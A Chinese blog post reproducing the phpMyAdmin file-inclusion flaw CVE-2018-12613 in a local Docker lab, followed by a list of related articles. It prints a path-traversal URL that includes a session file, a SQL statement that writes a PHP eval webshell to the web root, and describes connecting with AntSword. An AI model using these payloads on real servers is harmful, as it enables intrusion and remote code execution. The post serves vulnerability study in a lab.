CVE-2018-12613 PHPmyadmin文件包含漏洞

最新推荐文章于 2024-07-24 14:08:33 发布
最新推荐文章于 2024-07-24 14:08:33 发布
阅读量710 收藏 2
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48736242/article/details/127293059
版权

目录

1. 激活靶场​

2.漏洞验证

        2.1.浏览器访问,并访问server_sql.php,尝试写入一个phpinfo的小马

        2.2.查看session

        2.3.写入内容验证 

        2.4.浏览器执行

3.写入webshell

          3.1. phpinfo小马的作用    

      3.2. 换个厉害的马

         3.3. 包含文件

4. getshell

1. 激活靶场

2.漏洞验证

        2.1.浏览器访问,并访问server_sql.php,尝试写入一个phpinfo的小马

        2.2.查看session

        2.3.写入内容验证 

        进入靶场环境,查看是否写入:

docker ps        // 查看容器ID
docker exec ID /bin/bash    
ls
ls /tmp

经过与浏览器的session对比,查找到对应的文件

查看内容

tac /tmp/sess_2d198bfd6b6b4fe8366a83ef7220213e

 内容成功写入

        2.4.浏览器执行

http://127.0.0.1:8080/?target=sql.php?/../../../../../../../../tmp/sess_2d198bfd6b6b4fe8366a83ef7220213e

phpinfo小马成功执行

3.写入webshell

          3.1. phpinfo小马的作用    

        因为利用写入session的方式来写入shell,那么写入phpinfo小马的作用就很明显了,得到context_document_root的路径

      3.2. 换个厉害的马

        继续与写入phpinfo的操作一致,这次需要写入一个木马文件

         写入下列语句并执行

select "<?php file_put_contents('/var/www/html/getshell_new.php','<?php @eval($_POST[getshell_new]);?>')?>"

// 作用在于将POST得到的数据,写入到一个新的文件中

                

 查看session,并在靶场环境中检验一下是否成功,和写入小马的操作一样的,俺就不罗嗦了

 

         3.3. 包含文件

 尝试访问包含的get_shell.php,成功访问,说明包含成功

4. getshell

 打开中国蚁剑,建立连接

 

 

 

代码又崩了?!
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613
qq_51577576的博客
10-06 667
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613 在4.8.2之前的phpMyAdmin 4.8.x中发现了一个问题,攻击者可以在其中包含(查看并可能执行)服务器上的文件。该漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者还必须经过身份验证。
CVE-2018-12613 Phpmyadmin文件包含漏洞
weixin_51339377的博客
03-17 534
phpMyAdmin文件包含漏洞 利用条件: phpMyAdmin 4.8.0-4.8.1版本 用户已经拥有登录进入phpmyadmin后台的账号和密码 phpmyadmin配置文件位置 WWW\phpMyAdmin4.8.0\libraries\config.default.php 以下情况下攻击者在phpmyadmin中被重定向和加载,以及对白名单页面进行不正确的测试不需要身份验证: $cfg['AllowArbitraryServer']=true #攻击者可以指定.
Vulhub靶场-phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)
Grace_for_it的博客
05-03 540
vulhub靶场复现 php源码 bp抓包 网络安全 渗透测试
CVE-2018-12613phpMyAdmin文件包含漏洞复现
顶峰
03-29 624
漏洞
CVE-2018-12613 PhpMyadmin后台文件包含
baidu_26383841的博客
12-20 1010
当我们访问开放了用户注册和登录入口的站点时,正常情况下,用户访问每个页面站点都要检查当前登录的用户是否具有该页面的权限;如果站点不对用户权限进行检查,那么用户就可以访问该站点的任意页面,甚至可以查看其他用户的主页信息等。因此对用户访问的每个页面都进行权限检查是网站必须执行的操作。而实现该操作需要在每一个页面中都写一段检查用户权限的代码,而检查用户的权限执行的是相同的逻辑操作,这就意味着每个页面都存在一段相同的代码,这是一个不理想的状态。
CVE-2018-12613 PHPmyadmin文件包含漏洞分析及漏洞利用
凝聚力安全团队
11-20 4093
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固 漏洞描述    影响版本 漏洞环境搭建 漏洞分析 漏洞利用 漏洞加固
CVE-2018-12613| phpmyadmin远程文件包含漏洞
星落的博客
12-09 428
影响范围 phpMyadmin 4.8.0 phpMyadmin 4.8.1 原打开index.php文件 分析50-63行代码 $target_blacklist = array ( 'import.php', 'export.php' ); // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_string($...
CVE-2018-12613Phpmyadmin后台 任意文件包含漏洞复现
weixin_55821558的博客
04-26 750
环境:php 5.5.30 工具:phpstudy(小皮面板) 这个漏洞是源于phpmyadmin中的index.php,下面是源码: 以上进行一下分析: 1.传入的target不能为空 2.必须是一个字符串 3.不能以index开头 4.不能再数组target_blacklist中 5.且经过checkPageValidit检查后为真 首先前三个都很好理解 我们先看一下第四个 黑名单为: 在index.php中,已经事先定义了target_blacklist的值,即import.php和ex
漏洞复现】CVE-2018-12613 phpMyAdmin文件包含getshell
Mr_atopos的博客
05-22 448
漏洞影响phpMyAdmin 4.8.0-4.8.1版本 checkPageValidity函数对数据的处理逻辑不够严密,利用二次url编码绕过文件包含检测 payload 通过查询在session中添加php语句,再通过文件包含执行 ?target=db_sql.php%253f/…/…/…/…/…/…/…/…/(要包含的文件) target有白名单检测机制,db_sql.php在白名单中 通过?的二次编码成%253f target在检测白名单的时候,会对db_sql.php%253f进行二次u
[Vulhub](CVE-2018-12613phpmyadmin 4.8.1远程文件包含漏洞
weixin_45605352的博客
05-06 965
0x01 预备知识 什么是文件包含漏洞? 攻击者利用包含的特性,加上应用本身对文件(包含)控制不严格,最终造成攻击者进行任意文件包含。(注:包含的文件会被当成脚本文件来解析) 一句话来说就是:文件包含并不属于漏洞,但是由于对包含进来的文件不可控,导致了文件包含漏洞的产生。 本地文件包含叫做LFI,远程文件包含叫做RFI,默认PHP不开启远程文件包含。 相关函数 include:PHP运行到include然后去调用被包含文件执行,如果包含文件不存在则报错,但是会继续往下执行; require:PHP在运
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
weblogic10.36 CVE-2018-2893补丁文件
08-02
WebLogic(CVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。...
E042-服务漏洞利用及加固-利用CVE-2018-12613漏洞实现远程文件包含.pdf
12-02
E042-服务漏洞利用及加固-利用CVE-2018-12613漏洞实现远程文件包含
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 441
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1088
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 323
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
windows zookeeper的cve-2018-8012的补丁文件放哪
09-08
Windows ZooKeeper的CVE-2018-8012漏洞的补丁文件应该放在ZooKeeper的安装目录中。具体而言,可以按照以下步骤进行操作: 1. 打开ZooKeeper的安装目录。默认情况下,ZooKeeper的安装目录通常位于C:\Program Files\...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值